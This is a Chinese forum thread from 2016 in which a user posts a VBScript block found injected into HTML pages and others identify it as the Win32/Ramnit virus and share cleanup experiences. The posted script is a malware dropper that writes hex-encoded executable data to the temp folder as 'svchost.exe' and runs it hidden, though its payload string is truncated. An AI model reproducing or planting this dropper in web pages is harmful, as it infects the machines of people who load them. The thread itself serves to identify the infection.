<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A900003000000
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>
1
zhanglp888 2016-01-12 09:51:31 +08:00
Win32/Ramnit
https://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Win32%2fRamnit dll 文件也会有问题, |
2
hicdn 2016-01-12 10:30:24 +08:00
这个是在服务器上看到的还是在浏览器里看到的
|
3
chinafeng 2016-01-12 10:47:55 +08:00
这是运行一个文件, svchost.exe, 目测是木马
|
4
bigtan 2016-01-12 10:54:05 +08:00
中过这个病毒
|
5
Moker 2016-01-12 10:59:31 +08:00
前段时间同事中过,会感染所有的.html 文件后缀,然后重装....不重装好像麻烦点
|
6
hienchu 2016-01-12 11:18:17 +08:00 via iPhone
怎么被入侵的?
|
7
ibcker 2016-01-12 12:03:26 +08:00
等下会不会有人发帖:今天攻击了一个网站,所有的 html 都被植入了一段 vbscript
|
8
am241 2016-01-12 12:08:39 +08:00
这种病毒十年前就不好用了吧
|
9
billyu 2016-01-12 12:32:40 +08:00
我前几天自己电脑也中了 然后用 360 国际版在安全模式下全盘杀毒搞定的 win7
|
11
visonme 2016-01-12 13:03:00 +08:00
|
12
blakefan OP 网页木马程序
|
13
prondtoo 2016-01-29 16:13:57 +08:00
刚弄好 nexpose ,有需要可以帮你扫一下。
|